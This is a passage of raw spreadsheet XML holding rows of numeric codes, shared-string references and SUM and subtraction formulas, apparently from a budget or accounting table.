        <f t="shared" si="56"/>
        <v>0</v>
      </c>
      <c r="O162" s="12">
        <f t="shared" si="56"/>
        <v>0</v>
      </c>
      <c r="P162" s="12">
        <f t="shared" si="56"/>
        <v>0</v>
      </c>
      <c r="Q162" s="12">
        <f t="shared" si="56"/>
        <v>0</v>
      </c>
      <c r="R162" s="12">
        <f t="shared" si="56"/>
        <v>0</v>
      </c>
      <c r="S162" s="12">
        <v>62</v>
      </c>
      <c r="T162" s="12">
        <v>0</v>
      </c>
      <c r="U162" s="12">
        <v>0</v>
      </c>
      <c r="V162" s="12">
        <v>0</v>
      </c>
      <c r="W162" s="12">
        <v>0</v>
      </c>
      <c r="X162" s="12">
        <v>15</v>
      </c>
      <c r="Y162" s="12">
        <v>0</v>
      </c>
      <c r="Z162" s="12">
        <v>0</v>
      </c>
      <c r="AA162" s="12">
        <v>0</v>
      </c>
      <c r="AB162" s="12">
        <v>0</v>
      </c>
      <c r="AC162" s="12">
        <v>0</v>
      </c>
      <c r="AD162" s="12">
        <v>0</v>
      </c>
      <c r="AE162" s="12">
        <f t="shared" ref="AE162:AP162" si="57">SUM(AE163:AE168)</f>
        <v>22</v>
      </c>
      <c r="AF162" s="12">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="AG162" s="12">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="AH162" s="12">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="AI162" s="12">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="AJ162" s="12">
        <f t="shared" si="57"/>
        <v>20</v>
      </c>
      <c r="AK162" s="12">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="AL162" s="12">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="AM162" s="12">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="AN162" s="12">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="AO162" s="12">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="AP162" s="12">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
    </row>
    <row r="163" ht="18" customHeight="1" spans="1:42">
      <c r="A163" s="10">
        <v>1030409</v>
      </c>
      <c r="B163" s="16" t="s">
        <v>2768</v>
      </c>
      <c r="C163" s="17">
        <v>0</v>
      </c>
      <c r="D163" s="13">
        <v>2012901</v>
      </c>
      <c r="E163" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F163" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G163" s="17"/>
      <c r="H163" s="17"/>
      <c r="I163" s="17"/>
      <c r="J163" s="17"/>
      <c r="K163" s="17"/>
      <c r="L163" s="17"/>
      <c r="M163" s="17"/>
      <c r="N163" s="17"/>
      <c r="O163" s="17"/>
      <c r="P163" s="17"/>
      <c r="Q163" s="17"/>
      <c r="R163" s="17"/>
      <c r="S163" s="17"/>
      <c r="T163" s="17"/>
      <c r="U163" s="17"/>
      <c r="V163" s="17"/>
      <c r="W163" s="17"/>
      <c r="X163" s="17"/>
      <c r="Y163" s="17"/>
      <c r="Z163" s="17"/>
      <c r="AA163" s="17"/>
      <c r="AB163" s="17"/>
      <c r="AC163" s="17"/>
      <c r="AD163" s="17"/>
      <c r="AE163" s="17">
        <f t="shared" ref="AE163:AP168" si="58">G163-S163</f>
        <v>0</v>
      </c>
      <c r="AF163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AG163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AH163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AI163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AJ163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AK163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AL163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AM163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AN163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AO163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AP163" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
    </row>
    <row r="164" ht="18" customHeight="1" spans="1:42">
      <c r="A164" s="10">
        <v>1030410</v>
      </c>
      <c r="B164" s="16" t="s">
        <v>2769</v>
      </c>
      <c r="C164" s="17">
        <v>0</v>
      </c>
      <c r="D164" s="13">
        <v>2012902</v>
      </c>
      <c r="E164" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F164" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G164" s="17"/>
      <c r="H164" s="17"/>
      <c r="I164" s="17"/>
      <c r="J164" s="17"/>
      <c r="K164" s="17"/>
      <c r="L164" s="17"/>
      <c r="M164" s="17"/>
      <c r="N164" s="17"/>
      <c r="O164" s="17"/>
      <c r="P164" s="17"/>
      <c r="Q164" s="17"/>
      <c r="R164" s="17"/>
      <c r="S164" s="17"/>
      <c r="T164" s="17"/>
      <c r="U164" s="17"/>
      <c r="V164" s="17"/>
      <c r="W164" s="17"/>
      <c r="X164" s="17"/>
      <c r="Y164" s="17"/>
      <c r="Z164" s="17"/>
      <c r="AA164" s="17"/>
      <c r="AB164" s="17"/>
      <c r="AC164" s="17"/>
      <c r="AD164" s="17"/>
      <c r="AE164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AF164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AG164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AH164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AI164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AJ164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AK164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AL164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AM164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AN164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AO164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AP164" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
    </row>
    <row r="165" ht="18" customHeight="1" spans="1:42">
      <c r="A165" s="10">
        <v>1030413</v>
      </c>
      <c r="B165" s="16" t="s">
        <v>2770</v>
      </c>
      <c r="C165" s="17">
        <v>0</v>
      </c>
      <c r="D165" s="13">
        <v>2012903</v>
      </c>
      <c r="E165" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F165" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G165" s="17"/>
      <c r="H165" s="17"/>
      <c r="I165" s="17"/>
      <c r="J165" s="17"/>
      <c r="K165" s="17"/>
      <c r="L165" s="17"/>
      <c r="M165" s="17"/>
      <c r="N165" s="17"/>
      <c r="O165" s="17"/>
      <c r="P165" s="17"/>
      <c r="Q165" s="17"/>
      <c r="R165" s="17"/>
      <c r="S165" s="17"/>
      <c r="T165" s="17"/>
      <c r="U165" s="17"/>
      <c r="V165" s="17"/>
      <c r="W165" s="17"/>
      <c r="X165" s="17"/>
      <c r="Y165" s="17"/>
      <c r="Z165" s="17"/>
      <c r="AA165" s="17"/>
      <c r="AB165" s="17"/>
      <c r="AC165" s="17"/>
      <c r="AD165" s="17"/>
      <c r="AE165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AF165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AG165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AH165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AI165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AJ165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AK165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AL165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AM165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AN165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AO165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AP165" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
    </row>
    <row r="166" ht="18" customHeight="1" spans="1:42">
      <c r="A166" s="10">
        <v>1030414</v>
      </c>
      <c r="B166" s="16" t="s">
        <v>2771</v>
      </c>
      <c r="C166" s="17">
        <v>0</v>
      </c>
      <c r="D166" s="13">
        <v>2012906</v>
      </c>
      <c r="E166" s="16" t="s">
        <v>2772</v>
      </c>
      <c r="F166" s="14">
        <f t="shared" si="43"/>
        <v>14</v>
      </c>
      <c r="G166" s="17">
        <v>81</v>
      </c>
      <c r="H166" s="17"/>
      <c r="I166" s="17"/>
      <c r="J166" s="17"/>
      <c r="K166" s="17"/>
      <c r="L166" s="17">
        <v>14</v>
      </c>
      <c r="M166" s="17"/>
      <c r="N166" s="17"/>
      <c r="O166" s="17"/>
      <c r="P166" s="17"/>
      <c r="Q166" s="17"/>
      <c r="R166" s="17"/>
      <c r="S166" s="17">
        <v>59</v>
      </c>
      <c r="T166" s="17"/>
      <c r="U166" s="17"/>
      <c r="V166" s="17"/>
      <c r="W166" s="17"/>
      <c r="X166" s="17"/>
      <c r="Y166" s="17"/>
      <c r="Z166" s="17"/>
      <c r="AA166" s="17"/>
      <c r="AB166" s="17"/>
      <c r="AC166" s="17"/>
      <c r="AD166" s="17"/>
      <c r="AE166" s="17">
        <f t="shared" si="58"/>
        <v>22</v>
      </c>
      <c r="AF166" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AG166" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AH166" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AI166" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AJ166" s="17">
        <f t="shared" si="58"/>
        <v>14</v>
      </c>
      <c r="AK166" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AL166" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AM166" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AN166" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AO166" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AP166" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
    </row>
    <row r="167" ht="18" customHeight="1" spans="1:42">
      <c r="A167" s="10">
        <v>1030415</v>
      </c>
      <c r="B167" s="16" t="s">
        <v>2773</v>
      </c>
      <c r="C167" s="17">
        <v>0</v>
      </c>
      <c r="D167" s="13">
        <v>2012950</v>
      </c>
      <c r="E167" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F167" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G167" s="17"/>
      <c r="H167" s="17"/>
      <c r="I167" s="17"/>
      <c r="J167" s="17"/>
      <c r="K167" s="17"/>
      <c r="L167" s="17"/>
      <c r="M167" s="17"/>
      <c r="N167" s="17"/>
      <c r="O167" s="17"/>
      <c r="P167" s="17"/>
      <c r="Q167" s="17"/>
      <c r="R167" s="17"/>
      <c r="S167" s="17"/>
      <c r="T167" s="17"/>
      <c r="U167" s="17"/>
      <c r="V167" s="17"/>
      <c r="W167" s="17"/>
      <c r="X167" s="17"/>
      <c r="Y167" s="17"/>
      <c r="Z167" s="17"/>
      <c r="AA167" s="17"/>
      <c r="AB167" s="17"/>
      <c r="AC167" s="17"/>
      <c r="AD167" s="17"/>
      <c r="AE167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AF167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AG167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AH167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AI167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AJ167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AK167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AL167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AM167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AN167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AO167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AP167" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
    </row>
    <row r="168" ht="18" customHeight="1" spans="1:42">
      <c r="A168" s="10">
        <v>1030416</v>
      </c>
      <c r="B168" s="16" t="s">
        <v>2774</v>
      </c>
      <c r="C168" s="17">
        <v>0</v>
      </c>
      <c r="D168" s="13">
        <v>2012999</v>
      </c>
      <c r="E168" s="16" t="s">
        <v>2775</v>
      </c>
      <c r="F168" s="14">
        <f t="shared" si="43"/>
        <v>21</v>
      </c>
      <c r="G168" s="17">
        <v>3</v>
      </c>
      <c r="H168" s="17"/>
      <c r="I168" s="17"/>
      <c r="J168" s="17"/>
      <c r="K168" s="17"/>
      <c r="L168" s="17">
        <v>21</v>
      </c>
      <c r="M168" s="17"/>
      <c r="N168" s="17"/>
      <c r="O168" s="17"/>
      <c r="P168" s="17"/>
      <c r="Q168" s="17"/>
      <c r="R168" s="17"/>
      <c r="S168" s="17">
        <v>3</v>
      </c>
      <c r="T168" s="17"/>
      <c r="U168" s="17"/>
      <c r="V168" s="17"/>
      <c r="W168" s="17"/>
      <c r="X168" s="17">
        <v>15</v>
      </c>
      <c r="Y168" s="17"/>
      <c r="Z168" s="17"/>
      <c r="AA168" s="17"/>
      <c r="AB168" s="17"/>
      <c r="AC168" s="17"/>
      <c r="AD168" s="17"/>
      <c r="AE168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AF168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AG168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AH168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AI168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AJ168" s="17">
        <f t="shared" si="58"/>
        <v>6</v>
      </c>
      <c r="AK168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AL168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AM168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AN168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AO168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="AP168" s="17">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
    </row>
    <row r="169" ht="18" customHeight="1" spans="1:42">
      <c r="A169" s="10">
        <v>1030417</v>
      </c>
      <c r="B169" s="16" t="s">
        <v>2776</v>
      </c>
      <c r="C169" s="17">
        <v>0</v>
      </c>
      <c r="D169" s="13">
        <v>20131</v>
      </c>
      <c r="E169" s="11" t="s">
        <v>2777</v>
      </c>
      <c r="F169" s="14">
        <f t="shared" si="43"/>
        <v>155</v>
      </c>
      <c r="G169" s="12">
        <f t="shared" ref="G169:R169" si="59">SUM(G170:G175)</f>
        <v>0</v>
      </c>
      <c r="H169" s="12">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="I169" s="12">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="J169" s="12">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="K169" s="12">
        <f t="shared" si="59"/>
        <v>88</v>
      </c>
      <c r="L169" s="12">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="M169" s="12">
        <f t="shared" si="59"/>
        <v>67</v>
      </c>
      <c r="N169" s="12">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="O169" s="12">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="P169" s="12">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="Q169" s="12">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="R169" s="12">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="S169" s="12">
        <v>0</v>
      </c>
      <c r="T169" s="12">
        <v>0</v>
      </c>
      <c r="U169" s="12">
        <v>0</v>
      </c>
      <c r="V169" s="12">
        <v>0</v>
      </c>
      <c r="W169" s="12">
        <v>78</v>
      </c>
      <c r="X169" s="12">
        <v>0</v>
      </c>
      <c r="Y169" s="12">
        <v>61</v>
      </c>
      <c r="Z169" s="12">
        <v>0</v>
      </c>
      <c r="AA169" s="12">
        <v>0</v>
      </c>
      <c r="AB169" s="12">
        <v>0</v>
      </c>
      <c r="AC169" s="12">
        <v>0</v>
      </c>
      <c r="AD169" s="12">
        <v>0</v>
      </c>
      <c r="AE169" s="12">
        <f t="shared" ref="AE169:AP169" si="60">SUM(AE170:AE175)</f>
        <v>0</v>
      </c>
      <c r="AF169" s="12">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="AG169" s="12">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="AH169" s="12">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="AI169" s="12">
        <f t="shared" si="60"/>
        <v>10</v>
      </c>
      <c r="AJ169" s="12">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="AK169" s="12">
        <f t="shared" si="60"/>
        <v>6</v>
      </c>
      <c r="AL169" s="12">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="AM169" s="12">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="AN169" s="12">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="AO169" s="12">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="AP169" s="12">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
    </row>
    <row r="170" ht="18" customHeight="1" spans="1:42">
      <c r="A170" s="10">
        <v>1030418</v>
      </c>
      <c r="B170" s="16" t="s">
        <v>2778</v>
      </c>
      <c r="C170" s="17">
        <v>0</v>
      </c>
      <c r="D170" s="13">
        <v>2013101</v>
      </c>
      <c r="E170" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F170" s="14">
        <f t="shared" si="43"/>
        <v>155</v>
      </c>
      <c r="G170" s="17"/>
      <c r="H170" s="17"/>
      <c r="I170" s="17"/>
      <c r="J170" s="17"/>
      <c r="K170" s="17">
        <v>88</v>
      </c>
      <c r="L170" s="17"/>
      <c r="M170" s="17">
        <v>67</v>
      </c>
      <c r="N170" s="17"/>
      <c r="O170" s="17"/>
      <c r="P170" s="17"/>
      <c r="Q170" s="17"/>
      <c r="R170" s="17"/>
      <c r="S170" s="17"/>
      <c r="T170" s="17"/>
      <c r="U170" s="17"/>
      <c r="V170" s="17"/>
      <c r="W170" s="17">
        <v>78</v>
      </c>
      <c r="X170" s="17"/>
      <c r="Y170" s="17">
        <v>61</v>
      </c>
      <c r="Z170" s="17"/>
      <c r="AA170" s="17"/>
      <c r="AB170" s="17"/>
      <c r="AC170" s="17"/>
      <c r="AD170" s="17"/>
      <c r="AE170" s="17">
        <f t="shared" ref="AE170:AP175" si="61">G170-S170</f>
        <v>0</v>
      </c>
      <c r="AF170" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AG170" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AH170" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AI170" s="17">
        <f t="shared" si="61"/>
        <v>10</v>
      </c>
      <c r="AJ170" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AK170" s="17">
        <f t="shared" si="61"/>
        <v>6</v>
      </c>
      <c r="AL170" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AM170" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AN170" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AO170" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AP170" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
    </row>
    <row r="171" ht="18" customHeight="1" spans="1:42">
      <c r="A171" s="10">
        <v>1030419</v>
      </c>
      <c r="B171" s="16" t="s">
        <v>2779</v>
      </c>
      <c r="C171" s="17">
        <v>0</v>
      </c>
      <c r="D171" s="13">
        <v>2013102</v>
      </c>
      <c r="E171" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F171" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G171" s="17"/>
      <c r="H171" s="17"/>
      <c r="I171" s="17"/>
      <c r="J171" s="17"/>
      <c r="K171" s="17"/>
      <c r="L171" s="17"/>
      <c r="M171" s="17"/>
      <c r="N171" s="17"/>
      <c r="O171" s="17"/>
      <c r="P171" s="17"/>
      <c r="Q171" s="17"/>
      <c r="R171" s="17"/>
      <c r="S171" s="17"/>
      <c r="T171" s="17"/>
      <c r="U171" s="17"/>
      <c r="V171" s="17"/>
      <c r="W171" s="17"/>
      <c r="X171" s="17"/>
      <c r="Y171" s="17"/>
      <c r="Z171" s="17"/>
      <c r="AA171" s="17"/>
      <c r="AB171" s="17"/>
      <c r="AC171" s="17"/>
      <c r="AD171" s="17"/>
      <c r="AE171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AF171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AG171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AH171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AI171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AJ171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AK171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AL171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AM171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AN171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AO171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AP171" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
    </row>
    <row r="172" ht="18" customHeight="1" spans="1:42">
      <c r="A172" s="10">
        <v>1030420</v>
      </c>
      <c r="B172" s="16" t="s">
        <v>2780</v>
      </c>
      <c r="C172" s="17">
        <v>0</v>
      </c>
      <c r="D172" s="13">
        <v>2013103</v>
      </c>
      <c r="E172" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F172" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G172" s="17"/>
      <c r="H172" s="17"/>
      <c r="I172" s="17"/>
      <c r="J172" s="17"/>
      <c r="K172" s="17"/>
      <c r="L172" s="17"/>
      <c r="M172" s="17"/>
      <c r="N172" s="17"/>
      <c r="O172" s="17"/>
      <c r="P172" s="17"/>
      <c r="Q172" s="17"/>
      <c r="R172" s="17"/>
      <c r="S172" s="17"/>
      <c r="T172" s="17"/>
      <c r="U172" s="17"/>
      <c r="V172" s="17"/>
      <c r="W172" s="17"/>
      <c r="X172" s="17"/>
      <c r="Y172" s="17"/>
      <c r="Z172" s="17"/>
      <c r="AA172" s="17"/>
      <c r="AB172" s="17"/>
      <c r="AC172" s="17"/>
      <c r="AD172" s="17"/>
      <c r="AE172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AF172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AG172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AH172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AI172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AJ172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AK172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AL172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AM172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AN172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AO172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AP172" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
    </row>
    <row r="173" ht="18" customHeight="1" spans="1:42">
      <c r="A173" s="10">
        <v>1030422</v>
      </c>
      <c r="B173" s="16" t="s">
        <v>2781</v>
      </c>
      <c r="C173" s="17">
        <v>0</v>
      </c>
      <c r="D173" s="13">
        <v>2013105</v>
      </c>
      <c r="E173" s="16" t="s">
        <v>2782</v>
      </c>
      <c r="F173" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G173" s="17"/>
      <c r="H173" s="17"/>
      <c r="I173" s="17"/>
      <c r="J173" s="17"/>
      <c r="K173" s="17"/>
      <c r="L173" s="17"/>
      <c r="M173" s="17"/>
      <c r="N173" s="17"/>
      <c r="O173" s="17"/>
      <c r="P173" s="17"/>
      <c r="Q173" s="17"/>
      <c r="R173" s="17"/>
      <c r="S173" s="17"/>
      <c r="T173" s="17"/>
      <c r="U173" s="17"/>
      <c r="V173" s="17"/>
      <c r="W173" s="17"/>
      <c r="X173" s="17"/>
      <c r="Y173" s="17"/>
      <c r="Z173" s="17"/>
      <c r="AA173" s="17"/>
      <c r="AB173" s="17"/>
      <c r="AC173" s="17"/>
      <c r="AD173" s="17"/>
      <c r="AE173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AF173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AG173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AH173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AI173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AJ173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AK173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AL173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AM173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AN173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AO173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AP173" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
    </row>
    <row r="174" ht="18" customHeight="1" spans="1:42">
      <c r="A174" s="10">
        <v>1030424</v>
      </c>
      <c r="B174" s="16" t="s">
        <v>2783</v>
      </c>
      <c r="C174" s="17">
        <v>0</v>
      </c>
      <c r="D174" s="13">
        <v>2013150</v>
      </c>
      <c r="E174" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F174" s="14">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="G174" s="17"/>
      <c r="H174" s="17"/>
      <c r="I174" s="17"/>
      <c r="J174" s="17"/>
      <c r="K174" s="17"/>
      <c r="L174" s="17"/>
      <c r="M174" s="17"/>
      <c r="N174" s="17"/>
      <c r="O174" s="17"/>
      <c r="P174" s="17"/>
      <c r="Q174" s="17"/>
      <c r="R174" s="17"/>
      <c r="S174" s="17"/>
      <c r="T174" s="17"/>
      <c r="U174" s="17"/>
      <c r="V174" s="17"/>
      <c r="W174" s="17"/>
      <c r="X174" s="17"/>
      <c r="Y174" s="17"/>
      <c r="Z174" s="17"/>
      <c r="AA174" s="17"/>
      <c r="AB174" s="17"/>
      <c r="AC174" s="17"/>
      <c r="AD174" s="17"/>
      <c r="AE174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AF174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AG174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AH174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AI174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AJ174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AK174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AL174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AM174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AN174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="AO174" s="17">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
